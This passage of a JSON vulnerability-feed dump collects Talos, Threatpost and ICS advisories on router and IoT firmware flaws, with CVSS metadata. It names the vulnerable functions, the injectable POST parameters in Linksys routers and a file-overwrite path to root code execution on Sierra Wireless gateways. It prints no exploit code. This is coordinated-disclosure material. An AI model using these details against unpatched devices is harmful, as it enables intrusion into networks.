to its original form. But something specifically caught my attention: There was no size check for the performed operations and the function assumes that after a \u2018%\u2019 there are always two bytes. So, what would happen if after \u2018%\u2019, only one character existed? The answer is that the s+3, in the strcpy, will access after the end of the string. So, it could lead to memory corruption. \n\nThen, I tried to exploit this bug on the router in question. But based on how the URL string was managed in that device, it was not possible. But it had the potential to crash other web servers that used this piece of code. That function belonged to the freshtomato library. So, I searched for the source code and noticed that at the beginning of the file containing that function, there was the following comment: \n\n\n\nIt was code from Broadcom. I searched for pieces of those comments on Google and found some projects using that code. Then, I also used grep.app writing a regex trying to catch the layout of the bug and found other projects. Some of these projects were code that can be tinkered with and/or in web server scenarios. So, we tested the code and eventually contacted multiple vendors regarding vulnerabilities in their respective products. \n\nThe similarities between the code utilized by each of the different projects is so similar that it is reasonable to assume that the code is taken from the same initial source. Seeing as how the code originally held a Broadcom copyright, it is likely that the code was part of a reference implementation that Broadcom released to help customers implement an HTTP server using a product from Broadcom. This vulnerability becomes more interesting as the vulnerable products are looked in more depth, including the open-source software ArduPilot. This software is an open-source autonomous vehicle package, not tied to Broadcom in any way, so the vulnerable code made its way into the code base without a direct reference implementation. This sort of extended code reuse is extraordinarily difficult to track down even with modern-day secure coding practices due to code being slightly modified to suit each use case specifically. For these reasons, it is extraordinarily important for developers to be vigilant in reviewing external functionality that are modified and inserted into a code base, as well as for security researchers to investigate issues that could easily be slightly mutated across multiple software packages. \n\nBelow are the vulnerabilities we disclosed and helped fix as part of this discovery. TALOS-2022-1509 TALOS-2022-1511 and TALOS-2022-1512 have been patched by their respective companies or maintainers. Talos additionally confirmed TALOS-2022-1510 is present in revisions 32270 to at least revision 48599 but was unpatched at the time of publishing, so later versions are also likely vulnerable.\n\n \n\n\n#### [TALOS-2022-1509](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1509>) (CVE-2022-28664 - CVE-2022-28665) \n\nA memory corruption vulnerability in the httpd\u2019s unescape functionality of FreshTomato, version 2022.1. A specially crafted HTTP request can lead to memory corruption. An attacker can send a network request to trigger this vulnerability. \n\n \n\n\n#### [TALOS-2022-1510](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1510>) (CVE-2022-27631) \n\nA memory corruption vulnerability in the httpd\u2019s unescape functionality of DD-WRT from Revision 32270 to Revision 48599 \u2014 a Linux-based firmware for embedded systems. Later versions of this product could also be vulnerable, as Talos recently confirmed that the issue was unpatched. A specially crafted HTTP request can lead to memory corruption. An attacker can send a network request to trigger this vulnerability. \n\n \n\n\n#### [TALOS-2022-1511](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1511>) (CVE-2022-26376) \n\nA memory corruption vulnerability in both the official Asuswrt firmware as well as the Asuswrt-Merlin New Gen open-source firmware alternative for Asus wireless routers. The vulnerability exists in the httpd\u2019s unescape functionality of these firmwares. A specially crafted HTTP request can lead to memory corruption. An attacker can send a network request to trigger this vulnerability. ASUSWRT, the company\u2019s user interface software for managing Asus devices, is also affected by this vulnerability. \n\n \n\n\n#### [TALOS-2022-1512](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1512>) (CVE-2022-28711) \n\nA memory corruption vulnerability in the cgi.c\u2019s unescape functionality of ArduPilot APWeb from master branch 50b6b7ac to master branch 46177cb9. ArduPilot is an open-source software suite that allows users to program autonomous flying and driving devices like drones. A specially crafted HTTP request can lead to memory corruption. An attacker can send a network request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-27T16:22:00", "type": "talosblog", "title": "Vulnerability Spotlight: How a code re-use issue led to vulnerabilities across multiple products", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26376", "CVE-2022-27631", "CVE-2022-28664", "CVE-2022-28665", "CVE-2022-28711"], "modified": "2022-07-29T14:01:04", "id": "TALOSBLOG:C5180F1E61B3AFB5FC8CDD116ED91BB4", "href": "http://blog.talosintelligence.com/2022/07/vulnerability-spotlight-how-code-re-use.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-21T08:21:29", "description": "[](<http://4.bp.blogspot.com/-UCVz750WFnc/XQfLKNiuy0I/AAAAAAAAG-4/PepLnAmhPOcStpiuTQHnyB_-DzrXcpLwACK4BGAYYCw/s1600/recurring%2Bblog%2Bimages_vuln%2Bspotlight.jpg>)_ \n_ \n_Dave McDaniel of Cisco Talos discovered these vulnerabilities._ \n\n\n### Executive summary\n\nKCodes\u2019 NetUSB kernel module contains two vulnerabilities that could allow an attacker to inappropriately access information on some NETGEAR wireless routers. Specific models of these routers utilize the kernel module from KCodes, a Taiwanese company. The module is custom-made for each device, but they all contain similar functions. \n \nThe module shares USB devices over TCP, allowing clients to use various vendor-made drivers and software to connect to these devices. An attacker could send specific packets on the local network to exploit vulnerabilities in NetUSB, forcing the routers to disclose sensitive information and even giving the attacker the ability to remotely execute code. \n \nIn accordance with our coordinated disclosure policy, Cisco Talos reached out to KCodes and NETGEAR regarding this vulnerability. After working with KCodes, they provided an update to NETGEAR, which is scheduled to release an update. Talos decided to release the details of our vulnerability after surpassing our 90-day deadline. \n\n\n### Vulnerability details\n\n**KCodes NetUSB unauthenticated remote kernel arbitrary memory read vulnerability (TALOS-2018-0775/CVE-2019-5016)** \n \nAn exploitable arbitrary memory read vulnerability exists in the KCodes NetUSB.ko kernel module which enables the ReadySHARE Printer functionality of at least two NETGEAR Nighthawk Routers and potentially several other vendors/products. A specially crafted index value can cause an invalid memory read, resulting in a denial of service or remote information disclosure. An unauthenticated attacker can send a crafted packet on the local network to trigger this vulnerability. \n \nRead the complete vulnerability advisory [here](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0775>) for additional information. \n \n**KCodes NetUSB unauthenticated remote kernel information disclosure vulnerability (TALOS-2018-0776/CVE-2019-5017)** \n \nAn exploitable information disclosure vulnerability exists in the KCodes NetUSB.ko kernel module that enables the ReadySHARE Printer functionality of at least two NETGEAR Nighthawk Routers and potentially several other vendors/products. An unauthenticated, remote attacker can craft and send a packet containing an opcode that will trigger the kernel module to return several addresses. One of which can be used to calculate the dynamic base address of the module for further exploitation. \n \nRead the complete vulnerability advisory [here](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0776>) for additional information. \n\n\n### Versions tested\n\nTalos tested and confirmed that TALOS-2019-0776 and TALOS-2019-0775 affects the NETGEAR Nighthawk AC3200 (R8000), firmware version 1.0.4.28_10.1.54 \u2014 NetUSB.ko 1.0.2.66. The NETGEAR Nighthawk AC3000 (R7900), firmware version 1.0.3.8_10.0.37 (11/1/18) \u2014 NetUSB.ko 1.0.2.69 is also affected by TALOS-2019-0775. \n[](<http://1.bp.blogspot.com/-F9akqwfHSKE/XQfK9xpUpTI/AAAAAAAAG-w/R6B_tElvubE6nkPTaKIUTL2uKqjKldjqACK4BGAYYCw/s1600/patch_availability_nopatch.jpg>) \n\n\n### \n\n\n### \n\n\n### Coverage\n\nThe following SNORT\u24c7 rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org. \n \nSnort Rules: 49087 \n\n\n \n\n\n", "cvss3": {}, "published": "2019-06-17T10:17:36", "type": "talosblog", "title": "Vulnerability Spotlight: Two bugs in KCodes NetUSB affect some NETGEAR routers", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-5016", "CVE-2019-5017"], "modified": "2019-06-17T10:17:36", "id": "TALOSBLOG:57AE67D092003BFBA2D8AC2BAB81030D", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/75kFzCzc-tI/vulnerability-spotlight-two-bugs-in.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2018-10-16T18:24:08", "description": "[](<https://2.bp.blogspot.com/-jp7H9n8hxiE/W8YNvsnT6VI/AAAAAAAAANU/LpwHdxH8cmw2fv5VPlwPWsxo8zL7hk0fACLcBGAs/s1600/image1.jpg>)\n\n \n \n_These vulnerabilities were discovered by Jared Rittle of Cisco Talos._ \n \nCisco Talos is disclosing several vulnerabilities in the operating system on the Linksys E Series of routers. \n \nMultiple exploitable OS command injection vulnerabilities exist in the Linksys E Series line of routers. An attacker can exploit these bugs by sending an authenticated HTTP request to the network configuration. An attacker could then gain the ability to arbitrarily execute code on the machine. \n \nThe E Series is a line of routers for small and home offices that contain several features to make them easier to use. The routers are designed to connect home computers, internet-ready TVs, game consoles, smartphones and other Wi-Fi devices. \n \n**Vulnerability Details** \n \n[TALOS-2018-0625](<http://www.talosintelligence.com/reports/TALOS-2018-0625>) describes three related vulnerabilities: CVE-2018-3953, CVE-2018-3954 and CVE-2018-3955. \n \nMany of the configuration details passed to the E Series of routers during their configuration must be retained across a device's power cycle. Since the device has only one writable directory (/tmp) and that directory is cleared on reboot, the device uses NVRAM to store configuration details. \n \nAll command injection paths follow this process: \n \nWhen the apply.cgi page is requested with parameters indicating a change to persistent configuration settings, those parameters are processed by the 'get_cgi' function call during, which then get placed directly into NVRAM via a 'nvram_set' call. \n \nAfter certain configuration changes are made, including both of the changes associated with these vulnerabilities, the device must be rebooted. The httpd binary handles this by sending a SIGHUP signal to PID 1, a binary named 'preinit'. The device then enters a code path where it restarts all necessary system services. \n \nWhen the 'preinit' binary enters this code path, it exposes functionality where raw data from nvram_get calls is passed into system commands. \n \nIn CVE-2018-3953, the data entered into the 'Router Name' input field through the web portal is submitted to apply.cgi as the value to the 'machine_name' POST parameter. The machine_name data goes through the nvram_set process described above. Eventually, within the 'start_lltd' function, a 'nvram_get' call is used to obtain the value of the user-controlled 'machine_name' NVRAM entry. This value is then entered directly into a command intended to write the hostname to a file and then execute it. \n \nCVE-2018-3954 applies to the same input field but follows a slightly different code path. Here, the vulnerability is triggered by 'set_host_domain_name' function in libshared.so where nvram_get is called against the 'machine_name' parameter. The result of that operation is subsequently combined with a string via a sprintf call and passed directly into the system command. \n \nFinally, in CVE-2018-3955, the data entered into the 'Domain Name' input field through the web portal is submitted to apply.cgi as the value to the 'wan_domain' POST parameter. The wan_domain data goes through the nvram_set process described above. \n \nWhen the 'preinit' binary receives the SIGHUP signal, it enters a code path that calls a function named 'set_host_domain_name' from its libshared.so shared object, which calls nvram_get against the 'wan_domain' parameter. The result of that operation is subsequently combined with a string via a snprintf call and passed directly into the system command. \n\n\n### Affected devices\n\nThe vulnerabilities are confirmed in multiple devices of the Linksys E Series of wireless routers with various firmware versions. Users are advised to update their routers to the latest version released by the manufacturer. \n\n\n## Discussion\n\nHome routers have become one of the main targets for malicious attacks. Although these vulnerabilities require the attacker to have already authenticated with the device, the vulnerabilities are serious as they allow a potential attacker full control over the device, which may include installation of additional malicious code. \n \nWidespread internet-of-things attacks such as Mirai and [VPNFilter](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>) show that attackers will keep their focus on discovering new vulnerabilities which would allow them to infect devices and conduct large scale as well as targeted attacks. These attacks are more difficult to detect and protection is available only after their manufacturers update the firmware and patch the vulnerability. \n \nKeeping the device firmware up to date is crucial to avoid SOHO routers participating in a distributed denial-of-service (DDoS) attack or becoming an infection vector in an attack targeted to your organization. \n \n\n\n[](<http://downloads.linksys.com/downloads/firmware/FW_E2500_3.0.05.002_20180914.bin>)\n\n## \n\n## Coverage\n\nThe following SNORT\u24c7 rule detects attempts to exploit these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For all current rule information, please refer to your Firepower Management Center or Snort.org. \n \nSnort rule: 47133 \n \n \n\n\n", "cvss3": {}, "published": "2018-10-16T09:25:00", "type": "talosblog", "title": "Vulnerability Spotlight: Linksys ESeries Multiple OS Command Injection Vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-3953", "CVE-2018-3954", "CVE-2018-3955"], "modified": "2018-10-16T17:30:58", "id": "TALOSBLOG:DA58A7666C6D2C98A3062307E13300AA", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/uHiEV5Ec19w/vulnerability-spotlight-linksys-eseries.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2020-04-08T11:52:13", "description": "A 5G wireless gateway tailored for industrial internet of things (IoT), retail point-of-sale and enterprise redundancy applications is riddled with vulnerabilities, include two critical bugs that allow remote code-execution (RCE) and arbitrary command-injection.\n\nThe Sierra Wireless AirLink ES450 LTE gateway (version 4.9.3) has 11 different bugs, which could be exploited for RCE, uncovering user credentials (including the administrator\u2019s password) and other scenarios, according to Cisco Talos, which found the issues. Sierra Wireless has issued an update and administrators are encouraged to apply it.\n\n\u201cThe majority of these vulnerabilities exist in ACEManager, the web server included with the ES450,\u201d Cisco explained in [an advisory](<https://blog.talosintelligence.com/2019/04/vulnerability-sierra-airlink.html>) on Thursday. \u201cACEManager is responsible for the majority of interactions on the device, including device reconfiguration, user authentication and certificate management.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe most serious of the flaws is a critical RCE vulnerability ([CVE-2018-4063](<https://www.talosintelligence.com/reports/TALOS-2018-0748>)), CVSS score of 9.9, in the upload.cgi function of the ACEManager, which allows an attacker to use a specially crafted HTTP request to upload executable code, to be routed to the web server.\n\n\u201cWhen uploading template files, you can specify the name of the file that you are uploading,\u201d according to Cisco. \u201cThere are no restrictions in place that protect the files that are currently on the device, used for normal operation. If a file is uploaded with the same name of the file that already exists in the directory, then we inherit the permissions of that file.\u201d\n\nFurther, since ACEManager is running as root, any executables that are run by those files will be running also as root. \u201cBy uploading a small wrapper, we can upload arbitrary code to the device and run by simply navigating to the web page through the browser,\u201d Cisco noted.\n\nAlso in the upload.cgi function, an unverified password change vulnerability ([CVE-2018-4064](<https://www.talosintelligence.com/reports/TALOS-2018-0749>)) opens the door to an unverified device configuration change, resulting in an unverified change of the `user` password on the device.\n\nIn both cases, an attacker exploiting the upload.cgi bugs can make an authenticated HTTP request to trigger the vulnerability.\n\nThere\u2019s also a critical command-injection vulnerability ([CVE-2018-4061](<https://www.talosintelligence.com/reports/TALOS-2018-0746>)), CVSS score of 9.9, which exists in the ACEManager iplogging.cgi functionality. An authenticated attacker can send a specially crafted HTTP request to inject arbitrary commands, resulting in arbitrary command execution as root. This bug most likely also affects the also most likely affects the AirLink GX450 product, Cisco added.\n\nAnother problem arises from having hard-coded credentials ([CVE-2018-4062](<https://www.talosintelligence.com/reports/TALOS-2018-0747>)) in the SNMPD function of the gateway.\n\n\u201cActivating SNMPD outside of the WebUI can cause the activation of the hard-coded credentials, resulting in the exposure of a privileged user,\u201d according to Cisco. \u201cAn attacker can activate SNMPD without any configuration changes to trigger this vulnerability.\u201d\n\nMeanwhile, there are four information-disclosure vulnerabilities. For one, the ACEManager authentication functionality is done in plaintext XML to the web server ([CVE-2018-4069](<https://www.talosintelligence.com/reports/TALOS-2018-0754>)), so an attacker can listen to network traffic upstream from the device to sniff out credentials.\n\nThe other three ([CVE-2018-4067](<https://www.talosintelligence.com/reports/TALOS-2018-0752>), [CVE-2018-4068](<https://www.talosintelligence.com/reports/TALOS-2018-0753>) and [CVE-2018-4070/CVE-2018-4071](<https://www.talosintelligence.com/reports/TALOS-2018-0755>)) can expose internal paths and files; the default configuration for the device; or plain text passwords and SNMP community strings. An attacker can send an unauthenticated HTTP request to trigger any of these.\n\nOther bugs include a permission assignment vulnerability ([CVE-2018-4072/CVE-2018-4073](<https://www.talosintelligence.com/reports/TALOS-2018-0756>)), a cross-site scripting (CSS) vulnerability ([CVE-2018-4065](<https://www.talosintelligence.com/reports/TALOS-2018-0750>)) and a cross-site request forgery (CSRF) vulnerability ([CVE-2018-4066](<https://www.talosintelligence.com/reports/TALOS-2018-0751>)).\n\nThe gateway is billed as a \u201ca reliable, secure LTE gateway,\u201d and is one of the first-to-market to capitalize on the deployment of next-generation 5G mobile networks, which are expected to support [a whole raft of new use cases](<https://threatpost.com/5g-security/140664/>), especially in the industrial IoT space. But as these flaws illustrate, vulnerabilities come with any new territory.\n\n\u201cHistory has shown us that when we expand our computing power and connectivity, we open up a new landscape for attackers to use against us, with prime examples of this being the cloud and connected IoT devices,\u201d Steve McGregory, senior director of application and threat intelligence at Ixia, told Threatpost. He added, \u201cWe are racing into 5G just as we did with IoT and the cloud\u2026if that trend is to continue, then we must plan and prepare.\u201d\n", "cvss3": {}, "published": "2019-04-26T16:12:06", "type": "threatpost", "title": "Critical Flaws in Sierra Wireless 5G Gateway Allow RCE, Command Injection", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-4061", "CVE-2018-4062", "CVE-2018-4063", "CVE-2018-4064", "CVE-2018-4065", "CVE-2018-4066", "CVE-2018-4067", "CVE-2018-4068", "CVE-2018-4069", "CVE-2018-4070", "CVE-2018-4071", "CVE-2018-4072", "CVE-2018-4073", "CVE-2020-0688"], "modified": "2019-04-26T16:12:06", "id": "THREATPOST:142DAF150C2BF9EB70ECE95F46939532", "href": "https://threatpost.com/critical-flaws-sierra-wireless-5g/144142/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-11T11:47:59", "description": "Sierra Wireless is warning that additional AirLink router models, which are targeted toward IoT applications, are vulnerable to previously-disclosed critical flaws.\n\nThe vulnerabilities are part of the 11 critical bugs disclosed on [Sierra Wireless\u2019 AirLink](<https://threatpost.com/critical-flaws-sierra-wireless-5g/144142/>) ES450 LTE router last week \u2013 only now, Sierra Wireless has extended the impact of those flaws to 11 other router models that are using the ALEOS software.\n\nSierra Wireless has released fixes; users are encouraged to apply patches as soon as possible.\n\nSierra Wireless\u2019 LTE AirLink routers are targeted toward embedded applications like transmitting data for fleets of vehicles (for example, in law enforcement settings, the routers collect data on whether a police car has engaged its lights and siren) and industrial machines (tracking the location of heavy equipment and assets for instance). ALEOS is the software powering these in-field devices, which enables users to collect and view data in real time.\n\nOverall, the company patched seven vulnerabilities \u2013 including two critical flaws, and five medium-severity vulnerabilities stemming from the ALEOS software on the AirLink routers: \u201cSuccessful exploitation of these vulnerabilities could allow attackers to remotely execute code, discover user credentials, upload files, or discover file paths,\u201d according to a [Thursday advisory](<https://ics-cert.us-cert.gov/advisories/ICSA-19-122-03>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nSierra Wireless said the following AirLink models (with the ALEOS software) are impacted: LS300, GX400, GX440, and ES440 (Version 4.4.8 and prior); GX450 and ES450 (All versions prior to 4.9.4); and MP70, MP70E, RV50, RV50X, LX40, and LX60 (All versions prior to 4.12).\n\nThe two most severe vulnerabilities are an OS command-injection flaw ([CVE-2018-4061](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4061>)), and an unrestricted file upload glitch ([CVE-2018-4063](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4063>)), both of which rank 9.1 out of 10 on the CVSS scale, making them critical in severity.\n\nCVE-2018-4061 exists in the way the web server behind the routers, ACEManager, constructs OS commands \u2013 it incorrectly double-checks special elements that could modify the intended OS command for the router. That means an attacker could create a specially crafted authenticated HTTP request, which could then can inject arbitrary commands and result in remote code-execution.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/05/03095102/sierra-wireless-mp70-telemetry-solution-1a.jpg>)\n\nAirLink Router\n\n\u201cThis weakness can lead to a vulnerability in environments in which the attacker does not have direct access to the operating system, such as in web applications,\u201d according to [notes on the vulnerability](<https://cwe.mitre.org/data/definitions/78.html>). \u201cAlternately, if the weakness occurs in a privileged program, it could allow the attacker to specify commands that normally would not be accessible, or to call alternate commands with privileges that the attacker does not have. The problem is exacerbated if the compromised process does not follow the principle of least privilege, because the attacker-controlled commands may run with special system privileges that increases the amount of damage.\u201d\n\nCVE-2018-4063 meanwhile allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product\u2019s environment.\n\nThat means that an attacker could easily use a specially crafted authenticated HTTP request to then upload a file, resulting in an executable, routable code upload to the web server.\n\nThe routers also contain five medium-severity vulnerabilities. Those include a cross-site request forgery glitch, which may allow an attacker access to authenticated pages via an authenticated user ([CVE-2018-4066](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4066>)); and a flaw that could activate hard-coded credentials ([CVE-2018-4062](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4062>)), then allowing for the exposure of a privileged user. Another flaw could enable a specially crafted HTTP ping request to cause reflected JavaScript to be executed and run on the user\u2019s browser ([CVE-2018-4065](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4065>)).\n\nThe software also lacks encryption for some sensitive data ([CVE-2018-4069](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4069>)) and contains an information-exposure flaw ([CVE-2018-4067](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4067>)).\n\nThe vulnerabilities were first reported by Carl Hurd and Jared Rittle of Cisco Talos.\n\nIn May 2018, Sierra Wireless [also patched](<https://threatpost.com/sierra-wireless-patches-critical-vulns-in-hundreds-of-thousands-of-wireless-routers/131804/>) two critical vulnerabilities for its range of routers that would leave the enterprise devices helpless to an array of remote threats.\n", "cvss3": {}, "published": "2019-05-03T14:36:25", "type": "threatpost", "title": "Multiple Sierra Wireless AirLink Routers Open to Remote Code Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-4061", "CVE-2018-4062", "CVE-2018-4063", "CVE-2018-4065", "CVE-2018-4066", "CVE-2018-4067", "CVE-2018-4069"], "modified": "2019-05-03T14:36:25", "id": "THREATPOST:4659C6740BE64D50B985F32560628891", "href": "https://threatpost.com/sierra-wireless-airlink-remote-code-execution/144332/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-12-01T16:23:04", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 9.1**\n * **ATTENTION:** Exploitable remotely/low skill level to exploit/public exploits are available\n * **Vendor:** Sierra Wireless\n * **Equipment: **AirLink ALEOS\n * **Vulnerabilities:** OS Command Injection, Use of Hard-coded Credentials, Unrestricted Upload of File with Dangerous Type, Cross-site Scripting, Cross-site Request Forgery, Information Exposure, Missing Encryption of Sensitive Data\n\n## 2\\. UPDATE INFORMATION\n\nThis updated advisory is a follow-up to the original advisory titled ICSA-19-122-03 Sierra Wireless AirLink ALEOS (Update A) that was published August 20, 2019, on the ICS webpage on us-cert.gov.\n\n## 3\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could allow attackers to remotely execute code, discover user credentials, upload files, or discover file paths.\n\n## 4\\. TECHNICAL DETAILS\n\n### 4.1 AFFECTED PRODUCTS\n\nSierra Wireless reports the vulnerabilities affect the following AirLink ALEOS versions and products:\n\n**\\--------- Begin Update B Part 1 of 2 ---------**\n\n * LS300, GX400, GX440, and ES440: All versions prior to 4.4.9\n\n**\\--------- End Update B Part 1 of 2 ---------**\n\n * GX450 and ES450: All versions prior to 4.9.4\n * MP70, MP70E, RV50, RV50X, LX40, and LX60: All versions prior to 4.12\n\n### 4.2 VULNERABILITY OVERVIEW\n\n#### 4.2.1 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN OS COMMAND ('OS COMMAND INJECTION') CWE-78](<https://cwe.mitre.org/data/definitions/78.html>)\n\nA specially crafted authenticated HTTP request can inject arbitrary commands, resulting in remote code execution.\n\n[CVE-2018-4061](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4061>) has been assigned to this vulnerability. A CVSS v3 base score of 9.1 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H>)).\n\n#### 4.2.2 [USE OF HARD-CODED CREDENTIALS CWE-798](<https://cwe.mitre.org/data/definitions/798.html>)\n\nActivating SNMPD outside of the WebUI can cause the activation of the hard-coded credentials, resulting in the exposure of a privileged user. An attacker can activate SNMPD without any configuration changes to trigger this vulnerability.\n\n[CVE-2018-4062](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4062>) has been assigned to this vulnerability. A CVSS v3 base score of 6.2 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:L/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:L/A:H>)).\n\n#### 4.2.3 [UNRESTRICTED UPLOAD OF FILE WITH DANGEROUS TYPE CWE-434](<https://cwe.mitre.org/data/definitions/434.html>)\n\nA specially crafted authenticated HTTP request can upload a file, resulting in an executable, routable code upload to the web server.\n\n[CVE-2018-4063](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4063>) has been assigned to this vulnerability. A CVSS v3 base score of 9.1 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H>)).\n\n#### 4.2.4 [IMPROPER NEUTRALIZATION OF INPUT DURING WEB PAGE GENERATION ('CROSS-SITE SCRIPTING') CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\nA specially crafted HTTP ping request can cause reflected JavaScript to be executed and run on the user\u2019s browser. An attacker can exploit this by convincing a user to click a link or embedded URL that redirects to the reflected cross-site scripting vulnerability.\n\n[CVE-2018-4065](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4065>) has been assigned to this vulnerability. A CVSS v3 base score of 6.1 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N>)).\n\n#### 4.2.5 [CROSS-SITE REQUEST FORGERY (CSRF) CWE-352](<https://cwe.mitre.org/data/definitions/352.html>)\n\nA specially crafted HTTP request can cause an authenticated user to perform privileged requests unknowingly, resulting in unauthenticated requests through an authenticated user. Triggering this vulnerability may allow an attacker access to authenticated pages via an authenticated user.\n\n[CVE-2018-4066](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4066>) has been assigned to this vulnerability. A CVSS v3 base score of 6.8 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:H>)).\n\n#### 4.2.6 [INFORMATION EXPOSURE CWE-200](<https://cwe.mitre.org/data/definitions/200.html>)\n\nA specially crafted authenticated HTTP request can cause an information leak, resulting in the disclosure of internal file paths.\n\n[CVE-2018-4067](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4067>) has been assigned to this vulnerability. A CVSS v3 base score of 4.1 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N>)).\n\n#### 4.2.7 [MISSING ENCRYPTION OF SENSITIVE DATA CWE-311](<https://cwe.mitre.org/data/definitions/311.html>)\n\nThe ACEManager authentication functionality is delivered in plaintext XML to the web server. An attacker can listen to network traffic upstream from the device, which may allow access to credentials.\n\n[CVE-2018-4069](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4069>) has been assigned to this vulnerability. A CVSS v3 base score of 5.9 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N>)).\n\n### 4.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Commercial Facilities, Communications, Emergency Services, Energy, Government Facilities, Transportation Systems, Water and Wastewater Systems\n * **COUNTRIES/AREAS DEPLOYED:** Worldwide\n * **COMPANY HEADQUARTERS LOCATION: **Canada\n\n### 4.4 RESEARCHER\n\nCarl Hurd and Jared Rittle of Cisco Talos reported these vulnerabilities to Sierra Wireless.\n\n## 5\\. MITIGATIONS\n\n**\\--------- Begin Update B Part 2 of 2 ---------**\n\nSierra Wireless recommends users upgrade to the latest version of ALEOS for the products and versions below. For upgrade assistance, contact an authorized AirLink reseller, Sierra Wireless sales, technical representative, or Sierra Wireless technical support.\n\n * LS300, GX400, GX440, ES440: ALEOS 4.4.9 \n * The [ALEOS 4.4.9 Release 